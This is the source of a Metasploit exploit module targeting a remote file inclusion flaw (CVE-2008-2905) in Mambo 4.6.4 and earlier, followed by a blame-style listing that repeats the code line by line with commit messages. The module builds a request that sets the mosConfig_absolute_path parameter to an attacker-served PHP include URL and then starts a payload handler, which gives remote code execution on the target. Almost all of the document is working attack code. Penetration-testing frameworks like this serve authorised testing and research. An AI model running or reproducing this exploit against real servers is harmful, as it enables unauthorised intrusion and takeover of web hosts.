metasploit-framework/modules/exploits/unix/webapp/mambo_cache_lite.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include',
      'Description'    => %q{
          This module exploits a remote file inclusion vulnerability in
        includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
        4.6.4 and earlier.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-2905' ],
          [ 'OSVDB', '46173' ],
          [ 'BID', '29716' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 32768,
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 14 2008',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
      ], self.class)
  end

  def php_exploit

    timeout = 0.01
    uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
    print_status("Trying uri #{uri}")

    response = send_request_raw( {
        'global' => true,
        'uri' => uri,
      },timeout)

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end

end
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer::PHPInclude`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include',`
			`'Description' => %q{`
			`This module exploits a remote file inclusion vulnerability in`
			`includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo`
			`4.6.4 and earlier.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-2905' ],`
			`[ 'OSVDB', '46173' ],`
			`[ 'BID', '29716' ],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'ConnectionType' => 'find',`
			`},`
			`'Space' => 32768,`
			`},`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DisclosureDate' => 'Jun 14 2008',`
			`'DefaultTarget' => 0))`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),`
			`], self.class)`
			`end`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def php_exploit`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`timeout = 0.01`
			`uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))`
			`print_status("Trying uri #{uri}")`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`response = send_request_raw( {`
			`'global' => true,`
			`'uri' => uri,`
			`},timeout)`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`end`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`end`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`end`